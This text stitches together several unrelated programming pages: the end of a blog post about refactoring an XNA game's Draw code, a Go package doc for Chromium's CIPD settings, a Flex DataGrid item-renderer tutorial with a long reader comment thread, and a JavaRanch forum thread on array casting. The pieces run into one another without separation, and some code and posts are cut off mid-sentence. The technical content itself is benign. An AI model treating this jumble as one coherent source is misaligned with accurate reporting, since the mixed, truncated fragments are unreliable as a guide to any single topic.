B : A { // ... public override void Draw(GameTime gameTime) { PartA(); spriteBatch.Draw(player2texture, player2rectangle, Color.White); PartB(); } }This is also why properly structured code is necessary. Instead of having massive amount of code inside one method, having the same code split over several methods improves maintainability and readability. Lesson 4 is connected to 2 and 3 as well. Inside my Gameplay class (the one having actual game logic) I had few... awkward? objects: Texture2D player1Texture; byte player1spawnID; Texture2D player2Texture; byte player2spawnID;Why is that? Player player1; Player player2; public override void LoadContent() { player1 = ScreenManager.Player1; player2 = ScreenManager.Player2; }In other words, I have objects related to players, whose objects persist through whole game, being created, disposed and recreated inside the class having game logic. Memory problems aside, not having player sprites stored inside player classes also forces me to needlessly duplicate the code and use additional checks to decide whose texture I need to move. Luckily, I don't need to do much to restructure the code and eliminate that annoyance. Suddenly, improving level fie doesn't seem so important. So, what did I learn from all that for next project (which is already defined in my head)? I wasted too much time restructuring current project to enable modifications and upgrades. In order to avoid this in next project, I need to write Game Design Document and Tech Document in order to precisely define project and save time. I hope that I won't repeat mistakes in the next project (Snake clone with 3D camera.) After reading some topics on GameDev.Net, especially this one, I realized I have to learn the following: - Garbage collector - Making unit tests Actually, quickly some.
http://www.gamedev.net/blog/1561/entry-2256881-fighting-the-code-backfire/#comment_2256153
CC-MAIN-2016-36
refinedweb
727
67.25
import "go.chromium.org/luci/cipd/appengine/impl/settings" Package settings contains definition of global CIPD backend settings. These are settings that are usually set only once after the initial service deployment. They are exposed through Admin portal interface. `json:"storage_gs_path"` // `json:"temp_gs_path"` // SignAs is a name of a service account whose private key to use for // generating signed Google Storage URLs (through signBlob IAM API) instead of // the default service account. // // This is mostly useful on dev_server running under developer's account. It // doesn't have private keys for signing, but can still call signBlob API. SignAs string `json:"sign_as"` } Settings contain CIPD backend settings. Get returns the settings from the local cache, checking they are populated. Returns grpc-annotated Internal error if something is wrong. ObjectPath constructs a path to the object in the Google Storage, starting from StorageGSPath root. Package settings imports 8 packages (graph) and is imported by 1 packages. Updated 2019-08-17. Refresh now. Tools for package owners.
https://godoc.org/go.chromium.org/luci/cipd/appengine/impl/settings
CC-MAIN-2019-35
refinedweb
164
50.43
CGTalk > Software Specific Forums > Maxon Cinema 4D > C4D <-> MotionBuilder Workflow? PDA View Full Version : C4D <-> MotionBuilder Workflow? seco7 12-24-2005, 01:05 AM I have been drawn to the MotionBuilder PLE (now that's good marketing), but I'm wondering if anyone with experience can give me an idea of the workflow between Cinema and MB? I could only find a little about some changes that have been made in the workflow with both C4D 9.5 and MB 7. I have no experience with CA ... just a little animating objects. I know this is painfully newbie'ish, but what role does each app play? Does the wireframe go from Cinema to MB, then back to Cinema in FBX for staging and rendering? How are textures effected? How much of the timeline etc can be changed in Cinema, in otherwords can it integrated with expresso for example? Thanks in advance, Steve Duffdaddy 12-24-2005, 09:38 AM head over to and have look at DVD by Olly Wuensch - combines C4D, Zbrush and Motionbuilder. robotbob 12-24-2005, 10:24 AM for a MB quickstart head over to 3d buzz - he has tutorials based on MB 4 but they are what i used to start. i also have ollys DVD which is great as well and invaluable for specific C4d --> MB tips. but basiclly my workflow is as follows model ( c4d ) weight + set bones ( c4d ) export via FBX set control rig in MB animate in MB + plot properties export via FBX import FBX back into C4D create a motion track for your topmost bone in c4d and apply your imported MB FBX ( topmost bone ) to that motion track - ( this includes using seperate motion tracks for props like a bike for instance + make your FBX from MB invisible.) textures are not affected because you are rendering your original mesh you exported to MB. expresso also works fine but for example if you use a position node to parent a hat to your characters head you use the head bone from your MB FBX reference as that is what is driving your native c4d mesh that you are rendering. render (c4d) probably sounds a bit confusing untill you get a vid tut. good luck pedro nutriman 12-24-2005, 11:38 AM Refers to older versions but i think it helps: seco7 12-24-2005, 06:23 PM Great, thank you all very much ... the resources look most excellent! Happy Holidays. CGTalk Moderation 12-24-2005, 06.
http://forums.cgsociety.org/archive/index.php/t-304509.html
crawl-003
refinedweb
416
69.31
Martin Michlmayr <tbm@cyrius.com> wrote: > > * Jim Gifford <maillist@jg555.com> [2006-01-16 08:27]: > > >>>The attached patch allows the tulip driver to work with the RaQ2's > > >>>network adapter. Without the patch under a 64 bit build, it will > > >>>never negotiate and will drop packets. This driver is part of > > >>>Linux Parisc, by Grant Grundler. It's currently in -mm, but Jeff > > >>>Garzick will not apply it to the main tree. > > >>> > > >>Why? > > Jeff Garzick refuses to apply it do to spinlocks. Andrew Morton is > > including in his tree because it fixes issue with Parisc and with > > MIPS based builds.. He > > researched the manufactures documentation and found out how to fix > > the driver to work to its optimum performance. He did this back in > > 2003, has submitted it to Jeff Garzick several times with no > > response.. Jeff sends > > back a one liner say doing to it's use of spinlocks it's not > > accepted. > > Andrew, do you think that issue will be resolved in some way at some > point? > This has been hanging around for too long. We need to get it over the hump. Jeff, can you please suggest how this patch should be altered to make it acceptable? Thanks. From: Jim Gifford <maillist@jg555.com>, Grant Grundler <grundler@parisc-linux.org>, Peter Horton <pdh@colonel-panic.org> With Grant's help I was able to get the tulip driver to work with 64 bit MIPS. Signed-off-by: Andrew Morton <akpm@osdl.org> --- drivers/net/tulip/media.c | 22 ++++++++++++++++++++-- drivers/net/tulip/tulip.h | 7 +++++-- drivers/net/tulip/tulip_core.c | 2 +- net/tulip/eeprom.c | 0 net/tulip/interrupt.c | 0 5 files changed, 26 insertions(+), 5 deletions(-) diff -puN drivers/net/tulip/eeprom.c~tulip-fix-for-64-bit-mips drivers/net/tulip/eeprom.c diff -puN drivers/net/tulip/interrupt.c~tulip-fix-for-64-bit-mips drivers/net/tulip/interrupt.c diff -puN drivers/net/tulip/media.c~tulip-fix-for-64-bit-mips drivers/net/tulip/media.c --- devel/drivers/net/tulip/media.c~tulip-fix-for-64-bit-mips 2006-01-05 22:45:01.000000000 -0800 +++ devel-akpm/drivers/net/tulip/media.c 2006-01-05 22:45:17.000000000 -0800 @@ -44,8 +44,10 @@ static const unsigned char comet_miireg2 /* MII transceiver control section. Read and write the MII registers using software-generated serial - MDIO protocol. See the MII specifications or DP83840A data sheet - for details. */ + MDIO protocol. + See IEEE 802.3-2002.pdf (Section 2, Chapter "22.2.4 Management functions") + or DP83840A data sheet for more details. + */ int tulip_mdio_read(struct net_device *dev, int phy_id, int location) { @@ -272,13 +274,29 @@ void tulip_select_media(struct net_devic int reset_length = p[2 + init_length]; misc_info = (u16*)(reset_sequence + reset_length); if (startup) { + int timeout = 10; /* max 1 ms */ iowrite32(mtable->csr12dir | 0x100, ioaddr + CSR12); for (i = 0; i < reset_length; i++) iowrite32(reset_sequence[i], ioaddr + CSR12); + + /* flush posted writes */ + ioread32(ioaddr + CSR12); + + /* Sect 3.10.3 in DP83840A.pdf (p39) */ + udelay(500); + + /* Section 4.2 in DP83840A.pdf (p43) */ + /* and IEEE 802.3 "22.2.4.1.1 Reset" */ + while (timeout-- && + (tulip_mdio_read (dev, phy_num, MII_BMCR) & BMCR_RESET)) + udelay(100); } for (i = 0; i < init_length; i++) iowrite32(init_sequence[i], ioaddr + CSR12); + + ioread32(ioaddr + CSR12); /* flush posted writes */ } + tmp_info = get_u16(&misc_info[1]); if (tmp_info) tp->advertising[phy_num] = tmp_info | 1; diff -puN drivers/net/tulip/tulip_core.c~tulip-fix-for-64-bit-mips drivers/net/tulip/tulip_core.c --- devel/drivers/net/tulip/tulip_core.c~tulip-fix-for-64-bit-mips 2006-01-05 22:45:01.000000000 -0800 +++ devel-akpm/drivers/net/tulip/tulip_core.c 2006-01-05 22:45:01.000000000 -0800 @@ -22,7 +22,7 @@ #else #define DRV_VERSION "1.1.13" #endif -#define DRV_RELDATE "May 11, 2002" +#define DRV_RELDATE "December 15, 2004" #include <linux/module.h> diff -puN drivers/net/tulip/tulip.h~tulip-fix-for-64-bit-mips drivers/net/tulip/tulip.h --- devel/drivers/net/tulip/tulip.h~tulip-fix-for-64-bit-mips 2006-01-05 22:45:01.000000000 -0800 +++ devel-akpm/drivers/net/tulip/tulip.h 2006-01-05 22:45:01.000000000 -0800 @@ -474,8 +474,11 @@ static inline void tulip_stop_rxtx(struc udelay(10); if (!i) - printk(KERN_DEBUG "%s: tulip_stop_rxtx() failed\n", - pci_name(tp->pdev)); + printk(KERN_DEBUG "%s: tulip_stop_rxtx() failed" + " (CSR5 0x%x CSR6 0x%x)\n", + pci_name(tp->pdev), + ioread32(ioaddr + CSR5), + ioread32(ioaddr + CSR6)); } } _
http://www.linux-mips.org/archives/linux-mips/2006-01/msg00147.html
CC-MAIN-2014-42
refinedweb
724
53.98
Reduce JavaScript payloads with code splitting Nobody likes waiting. Over 50% of users abandon a website if it takes longer than 3 seconds to load. Sending large JavaScript payloads impacts the speed of your site significantly. Instead of shipping all the JavaScript to your user as soon as the first page of your application is loaded, split your bundle into multiple pieces and only send what's necessary at the very beginning. Measure Lighthouse displays a failed audit when a significant amount of time is taken to execute all the JavaScript on a page. Split the JavaScript bundle to only send the code needed for the initial route when the user loads an application. This minimizes the amount of script that needs to be parsed and compiled, which results in faster page load times. Popular module bundlers like webpack, Parcel, and Rollup allow you to split your bundles using dynamic imports. For example, consider the following code snippet that shows an example of a someFunction method that gets fired when a form is submitted. import moduleA from "library"; form.addEventListener("submit", e => { e.preventDefault(); someFunction(); }); const someFunction = () => { // uses moduleA } In here, someFunction uses a module imported from a particular library. If this module is not being used elsewhere, the code block can be modified to use a dynamic import to fetch it only when the form is submitted by the user. form.addEventListener("submit", e => { e.preventDefault(); import('library.moduleA') .then(module => module.default) // using the default export .then(someFunction()) .catch(handleError()); }); const someFunction = () => { // uses moduleA } The code that makes up the module does not get included into the initial bundle and is now lazy loaded, or provided to the user only when it is needed after the form submission. To further improve page performance, preload critical chunks to prioritize and fetch them sooner. Although the previous code snippet is a simple example, lazy loading third party dependencies is not a common pattern in larger applications. Usually, third party dependencies are split into a separate vendor bundle that can be cached since they don't update as often. You can read more about how the SplitChunksPlugin can help you do this. Splitting on the route or component level when using a client-side framework is a simpler approach to lazy loading different parts of your application. Many popular frameworks that use webpack provide abstractions to make lazy loading easier than diving into the configurations yourself.
https://web.dev/reduce-javascript-payloads-with-code-splitting/
CC-MAIN-2020-50
refinedweb
405
53.51
Starting with IntelliJ IDEA 11 I cannot debug Flex 3.x projects anymore. The debugger connects to Flash Player debug (11.1.102.55), then it takes 10 seconds to start the project but all breakpoints (i.e. like trace() on line 11 below) are marked invalid/are skipped. So I tried Astella 112.507 - same thing. IDEA 10 debugger works fine with Flex 3.x. I am running OS-X 10.7.2. <?xml version="1.0"?> <mx:Application xmlns: <mx:Script><![CDATA[ import mx.controls.Alert; private function onCreationComplete():void { trace("onCreationComplete()"); // <== breakpoint marked invalid/skipped } ]]> </mx:Script> <mx:Button </mx:Application> Any idea what's wrong? BTW - how do I mark code blocks in forum text editor? Thanks and Regards, Peter Hm, all works fine for me in both IDEA and Astella. App starting takes less than a second and breakpoints work. Can you please attach sample project (though I hardly believe it differs from mine)? I just created a new project in Astella and added the onCreationComplete() method to add a breakpoint - so it is really the minimum. Strange, it does not work on my colleagues computer, either. We are both running OS-X 10.7.2 with the latest Java SDK (build 1.6.0_29-b11-402-11M3527) and Flash Player debug 11.1.102.55. Are you on Windows or Linux by any chance? Peter Windows 7, jdk 1.6.0_27 32bit, FP 11.1.102.55 standalone debugger. Will try on Mac. BTW what exact version of Flex SDK 3.x did you try? Hi Alexander, thanks for responding so quickly. I am working with the browser flash player plugin (because I need to fiddle with flashvars). I tried Flex SDK 3.6.0.16995, 3.5.0.12683 and 3.3.4852. Peter Thank you, my colleague has reproduced the problem and it seems to be a FP 11 for Mac bug. IDEA 10.5 works with this player version in the same way. I suppose you used a different FP when was working with IDEA 10.5, didn't you? Your are right, we had tested IDEA 10.5 with FP 10.3, sorry about the confusion. Once we update to FP 11.1 IDEA 10.5 has the same problem. Is there a chance that you can implement a workaround for the FP bug in IDEA/Astella? Otherwise it would be a pain to fix bugs in legacy Flex 3 projects :-( Thanks for responding so quickly, Peter We can debug the Adobe's flex debugger itself, but chances that FP bug can be workarounded at debugger side are very little. Most probably FP just gives incorrect responses to the debugger and this can't be workarounded. And slow startup on Mac - I have no idea what the problem is. Can you please open respective 2 issues in Adobe's bug tracker? They are not so responsive as we are, but may be they'd like to fix at least startup performance issue. More voodoo. Flash Builder 4.6 works normally - no startup delay, debugger works as expected. Damn, IDEA for coding, FB for Debugging is not so thrilling. Peter Need to sort out. Then please add a request in our tracker. Just to check if it is compiler or debugger issue, can you please try to debug swf compiled by FB using IDEA/Astella debugger (use remote flash run configuration)? I debugged a FB 4.6 compiled SWF with IDEA 11.0.1 - same problem, so it seems to be a debugger issue. I created YouTRACK issues for Astella and IDEA. Thanks, Peter One issue is enough
https://devnet.jetbrains.com/thread/433710
CC-MAIN-2015-18
refinedweb
607
79.06
This part of the program converts a 'target image' (the one that will be made up of small source images) to smaller blocks of color that other source images will try to match and then replace eventually. But for some reason, the size of the blocks keeps increasing with every iteration. I've tried so many different things that I've had to go through the script and delete out a bunch of things and add a couple more comments before posting. The target img is attached (a 1280x800 random google image), but any other picture should work just the same. Watch as the Y size of the blit increases with every block going down, and the X size increases as new rows are made. I hard coded in a set size for the solid color rectangle (2 pixels across, much smaller than I'll use), but for whatever reason this keeps increasing. The first row of blits is so small right now that it's hard to see. That quickly changes. **OK, image is not attaching. Here's the link to what I am using (), but any other pic/size renamed to target.jpg should do the same. If anyone can point me in the right direction it would be much appreciated. I want to cover this whole source pic in nice 12x12 blocks of solid color to start with. I can't figure out what is changing these block sizes as it goes. import pygame import os from time import sleep okformats = ['png','jpg','bmp','pcx','tif','lbm','pbm','pgm','ppm','xpm'] targetimg = 'C:\\Python27\\mosaic\\target.jpg' #sorry linux users, I got lazy here if targetimg[-3:] not in okformats: print 'That format is unsupported, get ready for some errors...' else: print 'Loading...' pygame.init() screen = pygame.display.set_mode((100,100)) #picked a size just to start it out clock = pygame.time.Clock() #possibly not needed in this script targetpic = pygame.image.load(targetimg).convert() targetrect = targetpic.get_rect() #returns something like [0,0,128,128] targetsize = targetrect[2:] targetw = targetrect[2] targeth = targetrect[3] numpicsx = 100 #number of pictures that make up the width sourceratio = 1 #testing with square pics for now picxsize = targetw/numpicsx numpicsy = targeth/(picxsize*sourceratio) picysize = targeth/numpicsy print 'Blitting target image' screen = pygame.display.set_mode(targetsize) screen.fill((255,255,255)) #set to white in case of transparency screen.blit(targetpic,(0,0)) #update screen pygame.display.update() pygame.display.flip() clock.tick(30) SLOWDOWN = .1 #temp slow down to watch it print numpicsx #here are some print statements just to show all the starting values are correct print numpicsy print '---' print picxsize print picysize sleep(1) for x in xrange(numpicsx): for y in xrange(numpicsy): currentrect = [x*picxsize,y*picysize,x*picxsize+picxsize,y*picysize+picysize] avgc = pygame.transform.average_color((targetpic), currentrect) #average color avgc = avgc[:3] #drops out the alpha if there is one #pygame.draw.rect(screen, avgc, currentrect) pygame.draw.rect(screen, avgc, (currentrect[0],currentrect[1],currentrect[0]+2,currentrect[1]+2)) #hard coded 2s (rather than 12s in this case) to help pin point the problem pygame.display.update() pygame.display.flip() clock.tick(30) #probably not needed sleep(SLOWDOWN) print 'Done./nSleeping then quitting...' sleep(3) pygame.quit()
http://www.dreamincode.net/forums/topic/306706-pygame-problem-with-blit-and-strange-variable-issues/
CC-MAIN-2018-13
refinedweb
544
56.55
The. Full code after the jump. And the custom item renderer, PriceLabel.as, is as follows: View source is enabled in the following example. 48 thoughts on “Formatting a Flex DataGrid control using a custom item renderer” Hi, Thanks a lot man ! Hi Peter, Thanks for the example! :) Do you know how to create an item renderer in a datagrid column that creates different components based on the data? For example, column 1…….column 2 ————————- item 1………[checkbox] item 2………[checkbox] item 3………[combobox] item 4………[textinput] item 5………[textinput] data: array = [{label:'item 1',type:'checkbox'},etc] When I scroll or sort the headers everything screws up. How do I center align a checkbox inside a datagrid? It always aligns left…Please help. Richie, I’m not sure, but check out Alex Harui’s excellent blog entry, “More Thinking About Item Renderers”, which has demo and full source code. Peter Could you say me build number of Flex complier. I got another behavior of your example. Price column and cell have the same align – “right”. My build number: Version 2.0.1 build 155542. Thanx. sinnus, All of the examples in this blog were built with various beta/nightly builds of the Flex 3 SDK. Peter @Ritchie, I’ve centered a checkbox in a datagrid column before by adding an HBox around it and using horizontalAlign=”center” Hey Now, Nice post it was helpful to me. Thx 4 the info, Catto An improvement to the label function might be to change the return currencyFormatter.format(item.@price); t0 return currencyFormatter.format(item[column.dataField]); This should make the label function usable on any column that can be formatted as currency rather than hardcoding in the column field. Hi Peter, how can I do to change the background of entire line, based in some information in the fields? Thanks. @judah (6 months later), i think you need to override the set data accessor – the same instances of the renderer get reused, you’ll need to change the contents of the view hierarchy when the data changes, Flex newbie… Is there a way to make this package more generic so the colomn nmae doesn’t have to be embedded in the package? This way any column that needed this formating “itemRenderer” could use this package. Thanks for all of your examples!! Greg C, Try something like this: Peter Hi , i was wondering where the listData object comes from? Thanks in advance for your help Thanks Peter. Worked great! Peter, I am trying to apply your above example to similar code for another use of a datagrid itemRenderer. So I was wondering if you could point me in the right direction if I wanted the value of an external Control to affect the threshold point of the values that are colored. So if I had an hslider it could be used to dynamically change the value of the cut-off point of the colored items in that column of the datagrid. So basically instead of: it would be: X being the value that would be represented by the position of the hslider. Does this make sense? Since I am new to this whole package/class thing I am not sure how to access that external value inside of the package that is being called by the itemRenderer of a grid column. Thanks again! Peter, Once again sorry for the double post… Any thoughts regarding how I can go about passing a dynamic value from a control into this package? I have tried a couple things and none of which seem to work. Thanks, Greg C Greg C, Probably not the best solution, but you could try using Application.application.slider.value. I’m not sure how well it would work since the itemRenderers wouldn’t necessarily be updated when the slider changes. Peter Some more great info, thanks for the tips. Note that a similar solution (for background-color) is posted by jlafferty at: Hi guys, In this example, how can be sorted the price column as a number? Any ideas? Janet janet, The price column is sorting as numbers, isn’t it? Peter Nope, when the prices are loaded you get ($1.32, $12.23, $4.96, $0.94), if you sort the price column you get ($12.23, $0.94, $1.32, $4.96) instead of ($12.23, $4.96, $1.32, $0.94), and if you sort again to get the numbers from descendant to ascendant you have($4.96, $1.32, $0.95, $12.23) instead of ($0.95, $1.32, $4.96, $12.23)… janet, Interesting. I see the same default sort as you (1.32, -12.23, 4.96, -0.94) — the items are unsorted and appear in the same order they were specified in the data provider. If I sort by price (descending), I get the following: -12.23, -0.94, 1.32, 4.96 (or Item 2, Item 4, Item 1, Item 3). This sort is correct since the biggest negative values are first and the biggest positive values are last. If I sort by price (ascending), I get the following: 4.96, 1.32, -0.94, -12.23 (or Item 3, Item 1, Item 4, Item 2). This sort is correct since the biggest positive values are first and the biggest negative values are last. Actually, are you sure your numbers are right? 0.94 and 12.23 are both negative numbers. So I wouldn’t expect the price column to sort as 12.23, 4.96, 1.32, 0.94 since both 0.94 and 12.23 are negative numbers in the data provider. I’d expect 4.96, 1.32, -0.94, -12.23. Peter hi, i have developed a similar example. the difference is that my item renderer is a linkbutton extend class. The override function is the next: my problem is when i sort a column. When i click the column header, the data rows are changed but not sorted… but i move the mouse cursor over the rows… magically… the data in the columns are going to appearing sorted. any idea? thanks, congratulations, it´s a great website Hello, Thank for this very interesting example. If a change the source with an arraycollection, what kind of modifications i must do in the PriceLabel.as field ? Thanks Best Regards Pierre, In PriceLabel.as, it looks like I hard-coded the column data field ( data.@price) into the item renderer. Of course, you could create a new subclass for each different data field (CostLabel.as, etc.), but that would probably not be the best approach. I think the better approach would be to look at my coworker Alex Harui’s solution to this, as he is ridiculously smarter than I am: “Thinking About Item Renderers”. Specifically, I was reading the Text Color and Styles in Item Renderers section. He shows how you can extend both the DataGridColumn and DataGridItemRenderer classes, and create a custom stylesFunction()method which evaluates the data in a column without hard-coding specific column names. Peter Can an ItemEditor dispatch their own events? If so, how do you set an event listener to capture the event? I’m trying to use similar code but have the logic based on the value of an attribute “D” in my xml data but I cannot figure out for the life of me how to access the attribute in the .as file for the current column (I’m using the renderer for multiple columns). My XML looks something like this: using data..@D gives all D values for the current cols node (i.e. “12″). Can anyone advise? Thanks! Sussed it! I have try your example.Very useful.Thanks lots. I still have one question and hope you can help. Now I have 2 string, lets say AAA and BBB which I want to change their color out of many data. I try to use : but it only change the color of BBB. So what should I do to change both field? thanks Hi, Very nice blog … Is there any way to change the text color of the entire row of a datagrid based on data with out creating a itemrenderer for each column. I have around 10 columns, and want to change the color of text to red or green based on some data. Thanks, Shreyas Is there any concern of this method being a performance hit? I put a trace statement in my updateDisplayList() in my custom component while I was getting things going. I noticed that if I had 10 items, on load i got 20-30 traces. If I move my mouse over I get more traces. Same with a select. I understand why this happens, but is there not a way to set it and forget it? Does the DG loose the settings each time it redraws?? I am still sort of amazed that there isn’t just a property to set for a row color. Hi peterd Instead of comparing the data value with 0, If i want to do comparison of two column value and set the row value red if column1 value is less than column2 value then how can i do? @Niladri, Try something like this: And the custom item renderer, PriceLabel.as, is as follows: Peter Thanks a lot Peter. Peter, I have one doubt.I’m allocating data field for the data grid column dynamically. So some time it will not have data field as col1,may be some time it will have column field as col3 or col4.So my question is instead of referring data field in PriceLabel.as can I use the column id of those two column in PriceLabel.as I would like to know if I could pass some objects to the constructor of the customItemRender class because I wasnt able to do it, the compiler throws an error. I attach my code below: customItemRender class: package core { import mx.containers.VBox; import mx.controls.TextInput; public class customItemRender extends VBox { public function customItemRender(_TextInput:TextInput, _TextInput2:TextInput){ //TODO: implement function super.addChild(_TextInput); super.addChild(_TextInput2); } } } Actionscript code for creating an AdvancedDataGrid itemRender: AdvancedDataGridColumn.itemRenderer = new ClassFactory(customItemRender(_TextInput1,_TextInput2)); Thanks in advance for your help, Regards Javier Thanks for the awesome example, I think the fact that you’re still getting comments on a two year old post speaks to the usefulness of it. I have multiple columns that I need to run through a label function, can you think of a quick way to make the label function re-usable? TIA, ~S Never mind, I got it: See any problems with that? Thanks again, ~S Great example, yet again you saved the day for me. Thanks for your example and the nice comments there. I am facing a problem while trying to change the background. I am trying to change the background of specific cells that pass conditions. Like here I am testing if I have start Letter then I am testing if it delivered to the group leader or not by testing the dates of Start Letter and system date. Then if it is already sent to group leader, check if the group leader approved it or not. If not check the difference between the dates of the system date and the sent to group leader date. If the result is greater than 15 and less than 30, color that cell with red color. The other cells that are not used like manager will be in gray. If you could help me with this problem. My code is the following: package com.aramco.easd.ats.vo { import flash.display.Graphics; import mx.controls.DataGrid; import mx.controls.Label; import mx.controls.dataGridClasses.*; import mx.utils.StringUtil; [Style(name="backgroundColor", type="uint", format="Color", inherit="no")] public class BackgroundColor extends Label { public var g:Graphics; public function BackgroundColor() { super(); } override protected function updateDisplayList(unscaledWidth:Number, unscaledHeight:Number):void { super.updateDisplayList(unscaledWidth, unscaledHeight); g = graphics; g.clear(); var grid1:DataGrid = DataGrid(DataGridListData(listData).owner); g = graphics; g.clear(); unscaledWidth = this.unscaledWidth; unscaledHeight = this.unscaledHeight; if (grid1.isItemSelected(data) || grid1.isItemHighlighted(data)) return; checkStageLevel(); } // end of override function public function checkStageLevel():void { var systdate:Date = new Date; // is the letter send or not to group leader if ((data.tmldSentDt == null || StringUtil.trim(data.tmldSentDt) == “”) && (data.taskStaDt != null || StringUtil.trim(data.taskStaDt) != “”)) { checkDurationForStage(systdate, convertMyDate(data.taskStaDt)); }// is the letter approved by group leader or waiting him/her to approve it if ((data.tmldApvDt == null || StringUtil.trim(data.tmldApvDt) == “”) && (data.tmldSentDt != null || StringUtil.trim(data.tmldSentDt) != “”)) { checkDurationForStage(systdate, convertMyDate(data.tmldSentDt)); }// is the letter approved by division head or waiting him/her to approve it if(data.ltrdesc == “Staking” || data.ltrdesc == ” Survey) { if ((data. mgraSentDt == data. mgraSentDt || StringUtil.trim(data.dvhwSentDt) == “”) && (data[DataGridListData(listData).dataField] == “mgraSentDt” || StringUtil.trim(data[DataGridListData(listData).dataField]) == “mgraSentDt”)) { g.beginFill(0xA9A9A9); g.drawRect(0, 0, unscaledWidth, unscaledHeight); g.endFill(); } if ((data. mgraApvDt == null || StringUtil.trim(data. MgraApvDt) == “”) && (data[DataGridListData(listData).dataField] == “mgraApvDt” || StringUtil.trim(data[DataGridListData(listData).dataField]) == “mgraApvDt”)) { g.beginFill(0xA9A9A9); g.drawRect(0, 0, unscaledWidth, unscaledHeight); g.endFill(); } } public function convertMyDate(strToCheck:String):Date { var uryear:String; var urmonth:String; var urday:String; var newDate:Date; uryear = strToCheck; if (uryear != null) uryear = uryear.substr(uryear.length – 4, 4); urmonth = strToCheck; if (urmonth != null) urmonth = urmonth.substr(0, urmonth.indexOf(“/”)); urday = strToCheck; urday = urday.substr(0, urday.length – 5); if (urday != null) urday = urday.substr(3, urday.indexOf(“/”)+1); newDate = new Date(Number(uryear),Number(urmonth)-1,Number(urday)); return(newDate); } public function checkDurationForStage(systdate:Date, VariableDate:Date):void { var ResultSysdate_VariableDate:Number = fromDates(VariableDate,systdate); if ( 15 < ResultSysdate_VariableDate && ResultSysdate_VariableDate <= 30 && data[DataGridListData(listData).dataField] == data[DataGridListData(listData).dataField] ) { g.beginFill(0xFF1234); g.drawRect(0, 0, unscaledWidth, unscaledHeight); g.endFill(); } else if ( 30 < ResultSysdate_VariableDate && ResultSysdate_VariableDate <= 50 && data[DataGridListData(listData).dataField] == data[DataGridListData(listData).dataField] ) { g.beginFill(0xFF1111); g.drawRect(0, 0, unscaledWidth, unscaledHeight); g.endFill(); } } public static function fromDates(start:Date, end:Date):Number { return Math.ceil((end.time – start.time)/MILLISECONDS_IN_DAY); } // end of fromDates function Thanks a lot, Helped great . This is my Dictionary for flex. :) Regards, Sankara narayanan Ekambaranathan. Hi, I have a problem with a data grid. Rows in my data grid display data with line breaks so if a text content is composed by 3 lines my row height expand in order to display all content. The problem is that the height of rows from what I see depends form the first row height but in my case sometimes first row has just one line and the third has 3 lines (but it’s formatted as the first with one line height). Hope you understand… Thanks. perfect solution Hi , I have a AdvancedDatagrid having a dataprovider. In one of the column there is a dropdownList (rendered) having a different data provider. On change of the dropdownlist i want to change the labels of one of the columns of Grid . how can this be done ? can you please reply ? Thanks Thanks, man. Much appreciated.
http://blog.flexexamples.com/2007/08/20/formatting-a-flex-datagrid-control-using-a-custom-item-renderer/
CC-MAIN-2014-35
refinedweb
2,508
67.15
Eric V. Smith wrote : > Also, I'm not sure how common nested namespace packages are. They seem common at least in Plone community : * * Maybe a Plone user (I'm not a Plone user) could tell us more about it... PJ Eby wrote: > The proposal itself is intriguing, but it's not only less backward > compatible and directory-cluttering, it has some potential for > ambiguity in the spec and doesn't seem like a reasonable departure > from other languages' conventions in this area. I have poor knowledge of other languages. I just asked, because I felt surprised we are about to create (potentially nested) empty directories in order to implement namespaces, then wondered if we could do it with only one directory. That said, my motivation isn't to block or change PEP 420. I was wondering why such a solution wasn't at least mentionned in the PEP as part of the discussions. PJ Eby wrote: > there is rarely a need for deep nesting +1 I currently don't know a Python package with more than 3 levels (like zc.recipe.egg), and I guess that more than 3 levels would be too much. Martin v. Löwis wrote: > In Java, people apparently want that because they get these deeply > nested directory hiearchies (org/apache/commons/betwixt/expression). > It's apparently possible to condense this into > org.apache.commons.betwixt/expression (which isn't a shorter string, > but fewer cd commands / explorer clicks / .svn folders). With a maximum of 3 levels, it's not a so big issue. A bit annoying, but low priority. Martin v. Löwis wrote: > On 13.05.2012 17:33, Guido van Rossum wrote: >> -1. It would create a very busy toplevel directory. There's a reason >> people nest directories... > > Alas, thanks to egg files, we already have busy toplevel directories, > which extend into long sys.path lists. seems a fair solution for this issue. Regards, Benoit
https://mail.python.org/pipermail/import-sig/2012-May/000637.html
CC-MAIN-2016-36
refinedweb
320
65.01
casting between a ref type and an array. vivek rai Ranch Hand Joined: May 08, 2000 Posts: 45 posted May 23, 2000 16:17:00 0 Hi gurus, This might be slightly off the mark.. and bit of a theoretical question.. anyway.. the JLS says... ( chap 5.. Conversions etc.., sec 5.5 ) "The detailed rules for compile-time correctness checking of a casting conversion of a value of compile-time reference type S (source) to a compile-time reference type T (target) are as follows: If S is a class type: If T is an array type, then S must be the class Object, or a compile-time error occurs. " now, my question is: any Class can be cast as Object, So basically any class can be coverted to some array of some other class without any compile-time array by casting it in two steps..i.e, cast to Object first and then to the array type. for example, ----- class Point { int x,y; } class SomeClass {} public class Test { public static void main ( String [] args ) { Point p = new Point(); SomeClass asc[] = new SomeClass[5]; // this compiles asc = ( SomeClass[] ) ( ( Object ) p ); // this gives the compiler error /* Invalid cast from Point to SomeClass[]. asc = ( SomeClass[] ) ( p ); */ asc = ( SomeClass[] ) ( p ); } } ---- So what is really meant by the statement given in JLS? Is it incorrect, or has it to be interpreted as for being for a single cast operation? Am I missing something here? regards, vivek Herbert Maosa Ranch Hand Joined: May 03, 2000 Posts: 289 posted May 23, 2000 18:27:00 0 I have tried to go through your code. The statement under discussion, and indeed the rules governing safe compile time and run time casting are quite diverse and it is not feasible for me to discuss them all here. However as regards casting arrays note the following : 1. You can never safely cast a reference to an array into anything but a reference to an object of Class class or another array. Thus you can only do something like : a) Object someObject = (Object)somearray; or b)SomeArrayType = (SomeArrayType)anotherArray. Note that in the case of a), then you can safely just convert without explicit casting. In the case of b, it will only compile successfully IFF a)Both anotherArray and SomeArray contain object references AND b)The object references in anotherArray are such that they can be safely cast into the references contained in SomeArrayType. This could not be the best explanation, but if you follow it openly I believe it should shed more light on what that statement in JLS means. Regards, Herbert Ajith Kallambella Sheriff Joined: Mar 17, 2000 Posts: 5782 posted May 23, 2000 18:55:00 0 Here are my two cents worth.. The type of the Object is the class type that is used during its creation. The object continues to carry that identity all through its life.. We only cast references, we don't cast objects. A reference is simply looking at an object from a different( but coherent ) perspective. An object once created, its class type cannot be changed. Ajith Open Group Certified Distinguished IT Architect. Open Group Certified Master IT Architect. Sun Certified Architect (SCEA). Herbert Maosa Ranch Hand Joined: May 03, 2000 Posts: 289 posted May 23, 2000 22:26:00 0 Ajith, I just want to further this discussion with you and reach a consesus. I quote the following 